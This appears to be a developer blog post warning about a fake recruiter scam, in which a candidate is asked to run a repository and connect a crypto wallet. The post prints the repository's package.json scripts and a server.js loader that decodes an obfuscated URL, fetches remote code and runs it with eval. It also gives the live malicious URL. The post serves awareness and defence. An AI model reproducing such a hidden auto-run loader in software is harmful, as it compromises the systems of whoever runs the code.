Note: This story was adapted from a Reddit post. I have not directly communicated with anyone from the “Modex platform”. I am sharing this to raise awareness among developers for situations like this because they are common.
John was contacted by an HR representative regarding a Frontend Developer position; a very appealing offer. The job description can be found here. A meeting was scheduled, during which the recruiter provided a GitHub repository and asked him to clone it, run it locally, and connect his Metamask wallet.
Something about this seemed off, so John informed recruiter that he could not do it immediately and would review the code first. That decision likely prevented potential issues.
The suspicious scripts
When he looked at the package.json, he noticed the scripts:
"scripts": {
"start": "node server/server.js | react-scripts --openssl-legacy-provider start",
"build": "node server/server.js | react-scripts --openssl-legacy-provider build",
"test": "node server/server.js | react-scripts --openssl-legacy-provider test",
"eject": "node server/server.js | react-scripts --openssl-legacy-provider eject"
}
Opening server.js, he found this:
const AUTH_API_KEY = "aHR0cHM6Ly9hdXRobG9naW4tbmluZS52ZXJjZWwuYXBwL2FwaQ==";
(async () => {
const src = atob(AUTH_API_KEY);
const proxy = (await import('node-fetch')).default;
try {
const response = await proxy(src);
if (!response.ok) throw new Error(`HTTP error! status: ${response.status}`);
const proxyInfo = await response.text();
eval(proxyInfo);
} catch (err) {
console.error('Auth Error!', err);
}
})();
At first glance, it looked like an API key, but AUTH_API_KEY is actually a Base64-encoded URL pointing to a malicious link.
In this snippet atob is used to decode the value of AUTH_API_KEY into a plain URL. The decoded URL is stored in src, then node-fetch is dynamically imported and used: await proxy(src) fetches the remote content. Finally the fetched text (malicious code) is passed to eval and executed inside the Node.js process.
If we manually decode the value stored in
AUTH_API_KEY, it reveals the following URL: https://authlogin-nine.vercel.app/api
Decoded using: https://www.base64decode.org
When we open that link in our browser, we see the following:
You can check it yourself on: https://authlogin-nine.vercel.app/api
But is it safe to visit this link? Yes, it is secure to visit it because you are accessing it from your browser. There is no running Node.js environment or something similar that would actually run this code.
In conclusion, running npm run start or any similar command to start this project would expose your system to this malicious code.
What ChatGPT revealed about this malicious code?
After copying the code into ChatGPT for analysis, this was the response:
This is obfuscated Node.js malware/backdoor. It decodes strings at runtime, loads standard Node modules (os, fs, child_process), enumerates system/user info, reads and writes files, spawns commands, and contacts a remote endpoint. It acts as a downloader/exfiltrator and a persistence/command-execution helper. Treat it as malicious, isolate affected hosts, and perform incident response.
Research on the recruiter and company
The man checked the recruiter and the company online, and everything seemed legitimate:
- Recruiter’s presence on conference websites: VBS Live
- Forbes CEE Forum article: Forbes
- LinkedIn company profile: Modex Platform
- Company website: modex.tech
Conclusion & tips
John’s experience shows how convincing job offers can hide malicious code. By reviewing the code first, he avoided running a Node.js backdoor.
Tips to spot potential scams:
Requests to clone a repository and run it locally immediately
Asking to connect a crypto wallet or provide private keys
Pressure to complete tasks without reviewing the code first
Recruiters or companies that cannot be verified via LinkedIn, official website, or other credible sources
Being cautious and reviewing code carefully can prevent serious security risks.
Top comments (0)